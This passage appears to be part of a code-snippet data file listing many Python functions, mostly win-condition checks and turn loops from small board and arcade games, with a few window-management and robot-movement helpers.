_check_diagonal_win_condition(\n board):\n return True\n else:\n board.alternate_current_player()\n return False", "def WIN_BONUS() -> int:\n return 2", "def Win(self):\n print ( 10*\"*\")\n print (\"Player \" + self.character + \" says:\")\n print (\"I Won\")\n print ( 10*\"*\")", "def win_for(self, side):\n # Testing rows\n for row in range(self.height):\n for col in range(self.width - 3):\n if ( self.data[row][col] == side\n and self.data[row][col+1] == side\n and self.data[row][col+2] == side\n and self.data[row][col+3] == side):\n return True\n\n # Testing columns\n for col in range(self.width):\n for row in range(self.height - 3):\n if ( self.data[row][col] == side\n and self.data[row+1][col] == side\n and self.data[row+2][col] == side\n and self.data[row+3][col] == side):\n return True\n\n # Testing left diagonal\n for row in range(self.height - 3):\n for col in range(self.width - 3):\n if ( self.data[row][col] == side\n and self.data[row+1][col+1] == side\n and self.data[row+2][col+2] == side\n and self.data[row+3][col+3] == side):\n return True\n\n # Testing right diagonal\n for row in range(self.height - 3):\n for col in range(3, self.width):\n if ( self.data[row][col] == side\n and self.data[row+1][col-1] == side\n and self.data[row+2][col-2] == side\n and self.data[row+3][col-3] == side):\n return True\n\n return False", "def checkWin(self):\n winstates = [(0, 1, 2),\n (3, 4, 5),\n (6, 7, 8),\n (0, 3, 6),\n (1, 4, 7),\n (2, 5, 8),\n (0, 4, 8),\n (2, 4, 6)]\n win = False\n for state in winstates:\n if (self.gameState[state[0]] + self.gameState[state[1]] + self.gameState[state[2]]) == 3:\n self.handleWin(1)\n win = True\n elif (self.gameState[state[0]] + self.gameState[state[1]] + self.gameState[state[2]]) == -3:\n self.handleWin(-1)\n win = True\n\n if len([i for i in range(9) if self.gameState[i] == 0]) == 0 and not win:\n print(\"Draw yo\")\n self.handleDraw()\n return None", "def left_twist(self):\n self.turn_by_deg(-179)\n #time.sleep(.1)\n self.stop()\n self.turn_by_deg(-179)\n #time.sleep(.1)\n self.stop()", "def host_game(self):\n current_side = \"X\"\n while ( (not self.win_for(\"X\"))\n and (not self.win_for(\"O\"))\n and (not self.is_full())):\n print()\n print(self)\n print()\n move = Board.INVALID_MOVE\n while not self.allows_move(move):\n move = int(input(current_side + \"'s move: \"))\n self.add_move(move, current_side)\n if current_side == \"X\":\n current_side = \"O\"\n else:\n current_side = \"X\"\n\n if self.win_for(\"X\"):\n print(\"X wins --- congratulations!\\n\")\n elif self.win_for(\"O\"):\n print(\"O wins --- congratulations!\\n\")\n else:\n print(\"Tied game!\\n\")\n\n print()\n print(self)", "def make_turn(self):\n # if play first, start in the middle\n if np.count_nonzero(self.board) == 0:\n self.place_disc(self.board.shape[1] / 2)\n return 1\n\n\n # win if possible\n for try_column in range(0,self.board.shape[1]):\n if 0 == self.board[0, try_column]:\n new_board = self.simulate_place_disc(self.board, try_column, self.id())\n if dhw.did_he_win(new_board, self.id(), try_column):\n self.place_disc(try_column)\n return 1\n\n # don't loose if in danger\n for try_column in range(0, self.board.shape[1]):\n if 0 == self.board[0,try_column]:\n new_board = self.simulate_place_disc(self.board, try_column, 3 - self.id())\n if dhw.did_he_win(new_board, 3 - self.id(), try_column):\n self.place_disc(try_column)\n return 1\n\n # don't fall in trap!\n forbidden_columns = []\n for try_column in range(0, self.board.shape[1]):\n if 0 == self.board[0,try_column]:\n new_board = self.simulate_place_disc(self.board, try_column, self.id()) # my move\n new_board = self.simulate_place_disc(new_board, try_column, 3 - self.id()) # enemy move\n if dhw.did_he_win(new_board, 3 - self.id(), try_column):\n if try_column not in forbidden_columns: forbidden_columns.append(try_column)\n\n # don't ruin my trap\n for try_column in range(0, self.board.shape[1]):\n if 0 == self.board[0,try_column]:\n new_board = self.simulate_place_disc(self.board, try_column, 3 - self.id()) # 'my' move\n new_board = self.simulate_place_disc(new_board, try_column, self.id()) # my move\n if dhw.did_he_win(new_board, self.id(), try_column):\n if try_column not in forbidden_columns: forbidden_columns.append(try_column)\n\n # allow forbidden_columns if no other choice\n if np.count_nonzero(self.board[0, :]) == self.board.shape[1] - len(forbidden_columns):\n forbidden_columns = []\n\n # otherwise, play randomly\n rannum = random.randrange(7)\n while 0 != self.board[0, rannum] or rannum in forbidden_columns:\n rannum = random.randrange(7)\n self.place_disc(rannum)\n return 1", "def __window_forward(self):\n pass", "def CheckWinInDirection(self, pos, direction):\n\n block_owner = self.state[pos]\n\n if block_owner == EMPTY:\n return False\n\n pos_1 = self.ApplyDirection(pos, direction) # Moving To Next Position (1D)\n pos_2 = self.ApplyDirection(pos_1, direction) # Moving To Next Position (1D)\n\n if pos_1 == -1 or pos_2 == -2: # -2 Will Be Max Because You Have To Check With Three Strick-Throughs\n return False\n\n if block_owner == self.state[pos_1] and block_owner == self.state[pos_2]: # Check If There's A StrickThrough\n return True\n\n return False", "def win(self):\n self.die()", "def game_win(self):\n self.win = True\n self.msg.set_text(u'YOU WIN <Press Space>')\n self.msg.show(True)", "def check_win(self):\r\n wins = [self.check_rows(), self.check_cols(), self.check_diag()]\r\n for case, pos in wins:\r\n if case != -1:\r\n print('Game over!')\r\n if self.grid[case][-1] == self.computer:\r\n print('The computer won!')\r\n return (True, pos)\r\n print('The player won!')\r\n return (True, pos)\r\n\r\n return (self.check_draw(), None)", "def check_for_win_lose(b):\r\n win_move = None\r\n block_win = None\r\n # check for wins based on row\r\n for ri in range(3):\r\n row = b[ri]\r\n if single_move(row):\r\n if row==[1,1,0]:\r\n win_move = (ri+1,3)\r\n elif row==[2,2,0]:\r\n block_win = (ri+1,3)\r\n elif row==[1,0,1]:\r\n win_move = (ri+1,2)\r\n elif row==[2,0,2]:\r\n block_win = (ri+1,2)\r\n elif row==[0,1,1]:\r\n win_move = (ri+1,1)\r\n elif row==[0,2,2]:\r\n block_win = (ri+1,1)\r\n else:\r\n print '144 ERROR!'\r\n print single_move(row)\r\n print row\r\n print ' '\r\n\r\n # check for win based on column\r\n for ci in range(3):\r\n col = get_col(b,ci)\r\n if single_move(col):\r\n if col==[1,1,0]:\r\n win_move = (3,ci+1)\r\n elif col==[2,2,0]:\r\n block_win = (3,ci+1)\r\n elif col==[1,0,1]:\r\n win_move = (2,ci+1)\r\n elif col==[2,0,2]:\r\n block_win = (2,ci+1)\r\n elif col==[0,1,1]:\r\n win_move = (1,ci+1)\r\n elif col==[0,2,2]:\r\n block_win = (1,ci+1)\r\n else:\r\n print '166 ERROR!'\r\n print single_move(col)\r\n print col\r\n print ' '\r\n\r\n # check for win on backward diagonal\r\n diag = get_bw_diag(b)\r\n if single_move(diag):\r\n if diag==[1,1,0]:\r\n win_move = (3,3)\r\n elif diag==[2,2,0]:\r\n block_win (3,3)\r\n elif diag == [1,0,1]:\r\n win_move = (2,2)\r\n elif diag==[2,0,2]:\r\n block_win = (2,2)\r\n elif diag == [0,1,1]:\r\n win_move = (1,1)\r\n elif diag==[0,2,2]:\r\n block_win = (1,1)\r\n \r\n # check for win on forward diagonal\r\n diag = get_fwd_diag(b)\r\n if single_move(diag):\r\n if diag == [1,1,0]:\r\n win_move = (3,1)\r\n elif diag==[2,2,0]:\r\n block_win = (3,1)\r\n elif diag == [1,0,1]:\r\n win_move = (2,2)\r\n elif diag==[2,0,2]:\r\n block_win = (2,2)\r\n elif diag == [0,1,1]:\r\n win_move = (1,3)\r\n elif diag==[0,2,2]:\r\n block_win = (1,3)\r\n\r\n if win_move is not None:\r\n return (win_move, True)\r\n elif block_win is not None:\r\n return (block_win, False)\r\n else:\r\n return (None, False)", "def _play(self, func):\n\n func()\n print('\\nhuman movement:\\n')\n print(self._board)\n\n while self._board.possible() != []:\n self._board.move_computer()\n print('\\ncomputer movement:\\n')\n print(self._board)\n if self._board.check_win():\n print('\\nwinner is computer')\n return\n\n func()\n print('\\nhuman movement:\\n')\n print(self._board)\n if self._board.check_win():\n print('\\nwinner is human')\n return\n print('\\nwinner is friendship :)')", "def play_game(self):\n while self.over is False:\n self.board.print_board()\n winner = self.check_over()\n if winner != -1:\n return winner\n self.p1.get_move(self.board)\n self.board.print_board()\n winner = self.check_over()\n if winner != -1:\n return winner\n self.p2.get_move(self.board)", "def __check_win_condition(self,token,coordinate):\n # Check if it's even possible to win yet\n if self._turn_counter >= 8 and self._turn_counter+1 < self._board_size**2:\n # Disable win\n # return False\n\n # Up and up right vectors\n vec1=(1,0)\n vec2=(1,1)\n\n # Loop both directions of vector\n for _ in range(2):\n if self.__check_direction(vec1,coordinate):\n self.__declare_winner()\n return True\n if self.__check_direction(vec2,coordinate):\n self.__declare_winner()\n return True\n\n # Turn vector directions\n vec1 = -vec1[1], vec1[0]\n vec2 = -vec2[1], vec2[0]\n\n # Check for draw\n elif self._turn_counter+1 >= self._board_size**2:\n if (self._gui):\n self.__turn_counter_label[\"text\"] = \"Draw!\"\n self.__status[\"text\"] = \"\"\n self.__status.update()\n self.__turn_counter_label.update()\n self._winner = 3\n if (self._state == PLAY): showerror(\"Draw\",\"Draw!\")\n return True", "def test_win(self):\n game = self.ending(['bw.wwwww'], 8, 1)\n game.man_move(0, 2)\n self.assertEqual(game.finish_state, (250, game.first_player, 'Win'))", "def determine_win(self):\n if self.match.radiant_win is True and self.player_slot < 5:\n return True\n if self.match.radiant_win is False and self.player_slot > 5:\n return True\n return False", "def nail_in(self):\n if not self.in_wall:\n self.in_wall = True", "def __win(self, a):\n for i in range(len(a)-self.k+1):\n flag = True\n for j in range(self.k):\n if not a[i+j]:\n flag = False\n break\n if flag: return True", "def combinedcontrol(self):\n print('conbinedcontrol\\r')\n persondistance = math.sqrt((self.currentx-self.personx)**2 + (self.currenty-self.persony)**2)\n if persondistance <= .5:\n self.goto_point(self.clearx,self.cleary)\n print 'avoiding\\r'\n else:\n self.goto_point(self.personx,self.persony)\n print 'following\\r'\n self.sendMessage()", "def main():\r\n lp = launchpad_py.Launchpad() \r\n lp.Open()\r\n lp.LedAllOn(0)\r\n displayField(lp)\r\n player = 1\r\n while True:\r\n time.sleep(0.01)\r\n if player == 1:\r\n letter = \" X \"\r\n if player == 2:\r\n letter = \" O \"\r\n if setCross(lp, player, field, letter):\r\n if player == 1:\r\n player = 2\r\n else:\r\n player = 1\r\n if theWinnerIs(field, letter):\r\n if letter == \" X \":\r\n allOnForWinner(field,letter,lp)\r\n if letter == \" O \":\r\n allOnForWinner(field,player,lp)\r\n break\r\n if equal(field):\r\n lp.LedAllOn(lp.LedGetColor(3, 3))\r\n break", "def check_win(self):\n win = None\n for pos in self.winning_pos:\n win = self.is_match(set(self.get_cells(pos)))\n if win:\n return win\n if not self.open_tiles():\n return \"Draw\"\n return win", "def checkForWin (self):\r\n\t\tw = self.getWinner()\r\n\t\tif w:\r\n\t\t\tself.printBoard()\r\n\t\t\traise Exception(w + ' won!')", "def right(self):\n win = self.clients.current_client\n x, y = win.x, win.y\n candidates = [c for c in self.clients if c.info()[\"x\"] > x]\n self.clients.current_client = self._get_closest(x, y, candidates)\n self.group.focus(self.clients.current_client)", "def vertical_win():\n\n vert_set = set()\n for i in range(0, board_size):\n for j in range(0, board_size):\n vert_set.add(self.board[j][i])\n if vert_set == set([o_symbol]) or vert_set == set([x_symbol]):\n print \"vertical win\"\n return True \n vert_set = set()", "def win(self):\n print \"\\n{0} has escaped the dungeon, as few before have. {0} survived {1} rooms.\\n\".format(self.name, self.roomCt)\n exit()", "def is_win_for(self, checker):\r\n assert(checker == 'X' or checker == 'O')\r\n\r\n return self.is_horizontal_win(checker) or \\\r\n self.is_vertical_win(checker) or \\\r\n self.is_down_diagonal_win(checker) or \\\r\n self.is_up_diagonal_win(checker)", "def foward_shimmey(self):\n for x in range(6):\n self.right(primary=60, counter=30)\n time.sleep(.5)\n self.left(primary=70, counter=30)\n time.sleep(.5)\n self.back()\n time.sleep(2) \n self.stop()", "def __handle_view_win_condition(self, gamestate_component):", "def winFor(self,player):\n if(self.cachedWin == False):\n won = False;\n if(player==WHITE):\n for x in range(0,WIDTH):\n if(self.gameState[x,0]==WHITE):\n won = True\n \n elif(player==BLACK):\n for x in range(0,WIDTH):\n if(self.gameState[x,HEIGHT-1]==BLACK):\n won = True\n \n if(len(self.successors()) == 0):#IF there are no available moves for both players\n bCount = self.count(BLACK) #check who has the most pawns\n wCount = self.count(BLACK)\n if(bCount>wCount):\n self.cachedWin = True\n self.cachedWinner = player\n return True\n if(wCount>bCount):\n self.cachedWin = True\n self.cachedWinner = player\n return True\n \n if(won):\n self.cachedWin = True\n self.cachedWinner = player\n return True\n else:\n return False\n else:\n return player == self.cachedWinner", "def win_game(self):\r\n self.board.clear_hovered_tiles_list()\r\n self.is_game_over = True\r\n self.reset_button.won_game()\r\n self.high_score.update(self.timer.seconds)", "def won(self):\n self.Display.blit(self.Won,[205-self.Won.get_width()//2,150-self.Won.get_height()//2])\n pygame.draw.rect(self.Display,[200,97,48],(60,230,290,70))\n pygame.draw.rect(self.Display,[200,97,48],(60,320,290,70))\n pygame.draw.rect(self.Display,[106,106,150],(65,235,280,60))\n pygame.draw.rect(self.Display,[106,106,150],(65,325,280,60))\n pygame.display.update()\n self.Display.blit(self.Newgame,[205-self.Newgame.get_width()//2,265-self.Newgame.get_height()//2])\n self.Display.blit(self.Continue,[205-self.Continue.get_width()//2,355-self.Continue.get_height()//2])\n pygame.display.update()\n while True:\n x,y=pygame.mouse.get_pos()\n if x>64 and y<345:\n if y>234 and y<295:\n pygame.draw.rect(self.Display,[200,97,48],(65,235,280,60))\n self.Display.blit(self.Newgame,[205-self.Newgame.get_width()//2,265-self.Newgame.get_height()//2])\n else:\n pygame.draw.rect(self.Display,[106,106,150],(65,235,280,60))\n self.Display.blit(self.Newgame,[205-self.Newgame.get_width()//2,265-self.Newgame.get_height()//2])\n if y>324 and y<386:\n pygame.draw.rect(self.Display,[200,97,48],(65,325,280,60))\n self.Display.blit(self.Continue,[205-self.Continue.get_width()//2,355-self.Continue.get_height()//2])\n else:\n pygame.draw.rect(self.Display,[106,106,150],(65,325,280,60))\n self.Display.blit(self.Continue,[205-self.Continue.get_width()//2,355-self.Continue.get_height()//2])\n pygame.display.update()\n for event in pygame.event.get():\n if event.type==pygame.QUIT:\n self.Game.GameBoard.display()\n return \"Exit\"\n elif event.type==pygame.MOUSEBUTTONDOWN:\n x,y=pygame.mouse.get_pos()\n if x>64 and x<345:\n if y>234 and y<296:\n return 'newgame'\n elif y>324 and y<386:\n return", "def notify_winner(self):\n self.is_winner = True", "def win_condition(self):\n return self.wave == 8", "def switchTurn(self):\n\n # Widget for player 1\n if self.frame1.state() == 'normal':\n self.frame2.deiconify()\n self.frame1.withdraw()\n self.frame1.update()\n self.frame2.update()\n if self.message[0]:\n showDialogBox(self.message[0]) # announce\n self.message[0] = None\n game2.canvas.tag_bind('square', '<Button-1>', game2.fire)\n\n # Widget for player 2\n else:\n self.frame1.deiconify()\n self.frame2.withdraw()\n self.frame1.update()\n self.frame2.update()\n if game2.isComputer == 1:\n self.frame1.after(500)\n game1.computer_fire()\n else:\n if self.message[1]:\n showDialogBox(self.message[1]) # announce\n self.message[1] = None\n game1.canvas.tag_bind('square', '<Button-1>', game1.fire)", "def check_winner(self):\n pass", "def TransferToWindow(self):\n return True", "def check_win(self):\n for pos in self.win_set:\n s = set([self.grid[p] for p in pos])\n if len(s) == 1 and (0 not in s):\n return True\n return False", "def launchGame(): \n # On rejoint la partie\n game.join()\n\n #On affecte le nom\n game.player.setName(options.name)\n\n #On créer une nouvelle fenetre\n win = createNewWin(curses)\n\n #On creer notre premiere pomme...\n win.addch(game.apple.coordx, game.apple.coordy, 'O', curses.color_pair(3))\n\n #On indique la direction par defaut du serpent, il ira par defaut a droite\n key = curses.KEY_RIGHT\n\n #On effectue une boucle infinie tant que la touche Echap (27) n'est pas\n #pressée.\n while key != 27:\n #On ajoute le score a la ligne 0, colonne 2\n #Le score est calcule en recuperant la longueur du serpent actuel\n #et en retirant 2 (sa valeur initiale)\t\n win.addstr(0,2,' Joueur : %s Score : %s ' %(game.player.name, str(game.player.score)), curses.color_pair(1))\n\n #On calcul un mouvement de ralentissement dependant de la longueur du\n #serpent\n win.timeout(180+ ( (len(game.snake.oSnake)-2) % 10- (len(game.snake.oSnake)-2) ) * 3 )\n\n #On 'hook' les touches\n getkey = win.getch()\n\n #On recupere la valeur de la touche par defaut\n key = key if getkey==-1 else getkey\n\n #Suivant la touche pressée, on modifie les positions de notre serpent\n game.snake.move(key)\n\n #On supprime les derniers elements sur lequel le Snake passe\n win.addch(game.snake.oSnake[len(game.snake.oSnake)-1][1],\n game.snake.oSnake[len(game.snake.oSnake)-1][0],' ')\n\n #On supprime un element du snake pour eviter la collision\n if win.inch(game.snake.oSnake[0][1], game.snake.oSnake[0][0]) & 255 == 32:\n game.snake.oSnake.pop()\n\n #Si on passe sur un element O\t\n elif win.inch(game.snake.oSnake[0][1],game.snake.oSnake[0][0]) & 255 == ord('O'):\n #On ajoute 1 point a notre Joueur\n game.player.addPoint()\n\n #On recalcule des nouvelles coordonnees pour la pomme\n game.apple.newApple()\n #On verifie les nouvelles coordonnees\n while game.apple.checkApple(game.snake.oSnake) != True:\n game.apple.newApple()\n\n #On l'affiche a l'ecran\n win.addch(game.apple.coordx, game.apple.coordy, 'O', curses.color_pair(3))\n\t\t\n else:\n break\n\n #On affiche une partie de notre Snake\n win.addch(game.snake.oSnake[0][1],game.snake.oSnake[0][0],'X', curses.color_pair(2))\n\n\n #Si on sort de la boucle (GameOver), alors on\n #détruit les fenetres\n destroyWin()\n\n #A la fin de la partie (game over), on affiche l'écran \n showGameOver()", "def move_window():\n\tif SLIDING_WINDOW:\n\t\t# get the chosen predicates\n\t\tpred = Predicate.objects.filter(pk__in=[p+1 for p in toggles.CHOSEN_PREDS])\n\n\t\t# handle window properties\n\t\tfor p in pred:\n\t\t\tp.move_window()", "def play(self):\n\n while self.board.board[self.board.target_location()[0]]\\\n [self.board.target_location()[1]] == \"E\": # the car didn't\n # arrive the exit\n self.__single_turn()\n print(\"you won!\")", "def determine_winner(self):\r\n for i in range(2):\r\n # Way of the Stone (capture opponent master)\r\n if not self.bitboard_king[i]:\r\n return 1 - i * 2\r\n # Way of the Stream (move master to opposite square)\r\n if self.bitboard_king[i] == self.WIN_BITMASK[i]:\r\n return i * 2 - 1\r\n return 0", "def run(self):\n while not self.turn_over:\n self.go()", "def win(self):\n return \"Win\"", "def check_win(self, board, move):\n for i, j, k in self.winning_cases:\n if board[i] == move and board[j] == move and board[k] == move:\n return True\n return False", "def horizontal_win():\n\n for i in range(0, board_size):\n if set(self.board[i]) == set([o_symbol]) or set(self.board[i]) == set([x_symbol]):\n print \"horizontal win\"\n return True", "def determine_round_winner(self):\n\n if self.getX() + self.SIZE[0] < 0:\n # point for player two\n return 2\n elif self.getX() > Configuration.windowWidth:\n # point for player one\n return 1", "def TransferFromWindow(self):\n return True", "def at_wall(self):\n\n wall_close = self.is_at_wall()\n \n # Decide which direction to go\n if wall_close:\n \n # Find the closest detected point\n dmin = self.distmax\n tmin = 0\n for i, d in enumerate(self.parameters.sensor_distances):\n if d < dmin:\n dmin = d\n tmin = self.parameters.sensor_poses[i].theta\n \n # Go that way\n if tmin > 0:\n self.parameters.direction = 'left'\n else:\n self.parameters.direction = 'right'\n \n # Notify the controller\n self.wall.set_parameters(self.parameters)\n \n # Save the closest we've been to the goal\n self.best_distance = self.distance_from_goal\n \n return wall_close", "def player_stage(niv): \n playing = True\n a = niv[0][0] \n b = niv[0][1] \n (x, y) = (a, b) \n state = [[a, b]] #Create a list with the starting point of the selected level patern.\n sense.stick.get_events()\n while playing:\n for event in sense.stick.get_events(): #It moves the pixel with the player moves and add the point passed by the player in the state[].\n if event.action == 'pressed':\n if event.direction == 'left':\n if x > 0:\n x = min(x-1, 7)\n state.append([x, y])\n elif event.direction == 'right':\n if x < 7:\n x = max(x+1, 0)\n state.append([x, y])\n if event.direction == 'down':\n if y < 7:\n y = min(y+1, 7)\n state.append([x, y])\n elif event.direction == 'up':\n if y > 0:\n y = max(y-1, 0)\n state.append([x, y])\n elif event.direction == 'middle':\n playing = False\n sense.set_pixel(x, y, RED)\n if state[:] == niv[:]: #Compare the way choosen by the player with the selected level patern. Results of the try.\n sense.show_message(\"WINNER !\",\n text_colour=LEMON, scroll_speed=0.05)\n sleep(2)\n main() #brings back to the level selection.\n else:\n sense.show_message(\"LOSER !\",\n text_colour=BLUE, scroll_speed=0.05)\n sleep(2)\n try_again(niv) #cf. try_again() function", "def backToMiddlePos():\n\tprogMode(True) # Active le couple de servos\n\taxDriver.goToPosition(axDriver.BROADCASTID, 0x1FF) # Renvoie a la position 0x1FF", "def won(self):\n for y in range(self.size):\n winning = []\n for x in range(self.size):\n if self.fields[x, y] == self.opponent:\n winning.append((x, y))\n if len(winning) == self.size:\n return winning\n for x in range(self.size):\n winning = []\n for y in range(self.size):\n if self.fields[x, y] == self.opponent:\n winning.append((x, y))\n if len(winning) == self.size:\n return winning\n winning = []\n for y in range(self.size):\n x = y\n if self.fields[x, y] == self.opponent:\n winning.append((x, y))\n if len(winning) == self.size:\n return winning\n winning = []\n for y in range(self.size):\n x = self.size-1-y\n if self.fields[x, y] == self.opponent:\n winning.append((x, y))\n if len(winning) == self.size:\n return winning\n return None", "def nav(self):\n print(\"-----------! NAVIGATION ACTIVATED !------------\\n\")\n print(\"-------- [ Press CTRL + C to stop me ] --------\\n\")\n print(\"-----------! NAVIGATION ACTIVATED !------------\\n\")\n #print(\"Wait a second. \\nI can't navigate the maze at all. Please give my programmer a zero.\")\n \n \n self.starting_postion = self.get_heading()\n while True:\n while self.quick_check():\n self.fwd()\n time.sleep(0.01)\n self.corner_count = 0 #counts the corners so you can use it later to get out of them\n self.stop()\n self.corner_work()\n self.left_or_right()\n # how would you make it turn when it is going the wrong direction", "def right_twist(self):\n self.turn_by_deg(180)\n #time.sleep(.1)\n self.stop()\n self.turn_by_deg(180)\n #time.sleep(.1)\n self.stop()", "def turn():\r\n global turn_no\r\n turn_no += 1\r\n dlog('Starting Turn!')\r\n board_size = get_board_size()\r\n\r\n team = get_team()\r\n opp_team = Team.WHITE if team == Team.BLACK else team.BLACK\r\n dlog('Team: ' + str(team))\r\n\r\n robottype = get_type()\r\n dlog('Type: ' + str(robottype))\r\n\r\n if robottype == RobotType.PAWN:\r\n dlog('Human')\r\n\r\n r, c = get_location()\r\n dlog('My location is: ' + str(r) + ' ' + str(c))\r\n\r\n if team == Team.WHITE:\r\n forward = 1\r\n scan = 2\r\n else:\r\n forward = -1\r\n scan = -2\r\n \r\n # try capturing pieces\r\n if check_space_wrapper(r + forward, c + 1, board_size) == opp_team: # up and right\r\n capture(r + forward, c + 1)\r\n dlog('Captured at: (' + str(r + forward) + ', ' + str(c + 1) + ')') \r\n\r\n elif check_space_wrapper(r + forward, c - 1, board_size) == opp_team: # up and left\r\n capture(r + forward, c - 1)\r\n dlog('Captured at: (' + str(r + forward) + ', ' + str(c - 1) + ')')\r\n \r\n elif r + forward != -1 and r + forward != board_size and not check_space_wrapper(r + forward, c, board_size):\r\n try:\r\n if check_space(r, c-1) == get_team() or check_space(r-1, c-1) == get_team() or check_space(r, c+1) == get_team() or check_space(r-1, c+1) == get_team():\r\n move_forward()\r\n dlog('Moved forward!')\r\n except:\r\n pass\r\n\r\n \r\n else:\r\n board = get_board()\r\n dlog(str(board))\r\n if team == Team.WHITE:\r\n forward = 1\r\n index = 0\r\n\r\n else:\r\n forward = -1\r\n index = board_size - 1\r\n \r\n deep_accum = []\r\n c_indexes = []\r\n heuristic_accum = []\r\n heuristic = 0\r\n for c in range(board_size):\r\n close = []\r\n for r in range(board_size):\r\n dlog(str(check_space(r, c)))\r\n if check_space(r, c) == opp_team:\r\n if team == Team.WHITE:\r\n close.append(r)\r\n elif team == Team.BLACK:\r\n close.append(board_size-r-1)\r\n heuristic -= 1\r\n elif check_space(r, c) == team:\r\n heuristic += 1\r\n else:\r\n continue\r\n heuristic_accum.append([heuristic, c])\r\n if close != []:\r\n c_indexes.append(c)\r\n deep = sorted(close)\r\n deep_accum.append(deep[0])\r\n heuristic = 0\r\n close_index = sorted(list(zip(deep_accum, c_indexes)))\r\n for c in close_index:\r\n if c[0] == 0:\r\n continue \r\n col = c[1]\r\n weighted_val = heuristic_accum[col][0]-15\r\n heuristic_accum[col][0] = weighted_val\r\n break\r\n\r\n heuristic_accum = sorted(heuristic_accum)\r\n\r\n for heur in heuristic_accum:\r\n col = heur[1]\r\n if not check_space_wrapper(index, col, board_size) and not check_space_wrapper(index+forward, col+1, board_size) == opp_team and not check_space_wrapper(index+forward, col-1, board_size) == opp_team:\r\n spawn(index, col)\r\n dlog('Spawned unit at: (' + str(index) + ', ' + str(col) + ')')\r\n break\r\n\r\n bytecode = get_bytecode()\r\n dlog('Done! Bytecode left: ' + str(bytecode))", "def win():\r\n\r\n\tglobal turn, tile1, tile2, tile3, tile4, tile5, tile6, tile7, tile8, tile9, move1, move2, player1, player2\r\n\r\n\twin1 = tile1==tile2==tile3==1 or tile1==tile2==tile3==2\r\n\twin2 = tile4==tile5==tile6==1 or tile4==tile5==tile6==2\r\n\twin3 = tile7==tile8==tile9==1 or tile7==tile8==tile9==2\r\n\twin4 = tile1==tile4==tile7==1 or tile1==tile4==tile7==2\r\n\twin5 = tile2==tile5==tile8==1 or tile2==tile5==tile8==2\r\n\twin6 = tile3==tile6==tile9==1 or tile3==tile6==tile9==2\r\n\twin7 = tile1==tile5==tile9==1 or tile1==tile5==tile9==2\r\n\twin8 = tile3==tile5==tile7==1 or tile3==tile5==tile7==2\r\n\r\n\twin = win1 or win2 or win3 or win4 or win5 or win6 or win7 or win8\r\n\treturn win", "def rough_outcome(self) -> float:\n # HUYNH YOU PRICK WHY THE FUCK DO YOU MAKE US WRITE THIS SHIT EVEN IT'S NOT USED ANYWHERE\n # pick move based on this may not be optimal but better than random\n # return 1 if win immediately\n # return -1 if all states reachable will result the other player win\n # return 0 if otherwise ??? what the fuck does this mean\n # look two states forward\n pass", "def player_win(self):\n global chips\n global placed_bet\n\n chips = (self.final_bet*2 + chips)\n self.victory = True\n placed_bet = False", "def uber_check_win(self):\n if self.player1.score == self.player2.score:\n print(\"It's a draw!\")\n elif self.player1.score > self.player2.score:\n print(\"Player 1 is a proper bad ass mother fucker\")\n else:\n print(\"Player numma 2 is a proper bad ass mother fucker\")", "def move_of_king_and_rook(self, from_row, from_col, to_row, to_col): \n #provjere da li su kraljevi ili topovi inicirali pomijeranje\n if(from_row == 7 and from_col == 0):\n self.wrl_moved = True\n elif(from_row == 7 and from_col == 7):\n self.wrr_moved = True\n elif(from_row == 7 and from_col == 4):\n self.wk_moved = True\n elif(from_row == 0 and from_col == 0):\n self.brl_moved = True\n elif(from_row == 0 and from_col == 7):\n self.brr_moved = True\n elif(from_row == 0 and from_col == 4):\n self.bk_moved = True\n \n #provjera da li je neko pojeo topove\n if(to_row == 7 and to_col == 0):\n self.wrl_moved = True\n elif(to_row == 7 and to_col == 7):\n self.wrr_moved = True\n elif(to_row == 0 and to_col == 0):\n self.brl_moved = True\n elif(to_row == 0 and to_col == 7):\n self.brr_moved = True", "def winner(self):\n raise NotImplementedError", "def winner(self):\n raise NotImplementedError", "def switch_view(self, *args):\n if not self.rightwin.data:\n return\n\n if self.cur == Win.right:\n self.switch_view_left()\n else:\n self.switch_view_right()\n self.leftwin.win.touchwin()", "def setup_winner(self):\n self.winnertime = FPS*4 \n self.wevegotawinner = self.winnertime#how many seconds it shows the winner\n self.winner_radius = max(self.height,self.width)\n self.now = time.time()", "def play_round(self):\r\n your_move = self.you.move()\r\n opposite_move = self.opposite.move()\r\n result = Game.what_move(your_move, opposite_move)\r\n\r\n self.you.learn(opposite_move)\r\n self.opposite.learn(your_move)\r\n\r\n print(\"you choose:\" + your_move + \" and the opposite player choose:\" +\r\n opposite_move)\r\n\r\n if result == 1:\r\n self.you.score += 1\r\n print('=> you won this round!\\n')\r\n elif result == 2:\r\n self.opposite.score += 1\r\n print('=> the opposite pleyer won this round!\\n')\r\n elif result == 0:\r\n print('=> it is Draw!\\n')", "def __take_turn(self,x,y):\n # Take player 1 turn\n if self._player == 1:\n # Return if winner found\n if self.__place_token(\"lightblue\", \"x\", x, y):\n return\n # Take player 2 turn\n elif self._player == 2:\n # Return if winner found\n if self.__place_token(\"lightcoral\", \"o\", x, y):\n return\n # Update board\n if (self._gui): self.__board[x][y].update()\n self.__end_turn()", "def isWin(self):\n\n return self.tiles == self.winCdt", "def next_move(ttt):\r\n # get board in 2D array form\r\n b = ttt.get_board()\r\n \r\n # if there's a winning move, take it\r\n (cfw, win_move) = check_for_win_lose(b)\r\n if cfw is not None:\r\n if win_move:\r\n print 'COMPUTER WINS!'\r\n return cfw, win_move\r\n # otherwise, pres on with the next best move\r\n\r\n # get \"points\" on board. this tells us not only the move\r\n # but also who went first\r\n board_count = sum(sum(b,[]))\r\n \r\n # IF COMPUTER HAS FIRST TURN\r\n # if 1st move\r\n if board_count == 0:\r\n return (2,2), False # take the center\r\n # this is not best strategy for winning, but\r\n # it the human messes up, the computer can win.\r\n # taking a corner first makes it a little easier\r\n # for the computer to win becase the human only\r\n # has one correct move to make: to take the center\r\n \r\n # if 3rd move, and not a winning one\r\n if board_count == 3:\r\n if b[0][1]==2 or b[1][0]==2 or b[0][0]==2:\r\n return (3,3), False\r\n elif b[0][2]==2:\r\n return (3,1), False\r\n elif b[2][0]==2:\r\n return (1,3), False\r\n else:#elif b[1][2]==2 or b[2][1]==2 or b[2][2]==2:\r\n return (1,1), False\r\n\r\n # if 5th move, and not a winning or losing one\r\n if board_count == 6:\r\n b5 = numpy.array([[0,2,1],[0,1,0],[2,0,0]])\r\n if (b == b5).all():\r\n return (3,3), False\r\n elif (b == numpy.rot90(b5,1)).all():\r\n return (3,1), False\r\n elif (b == numpy.rot90(b5,2)).all():\r\n return (1,1), False\r\n elif (b == 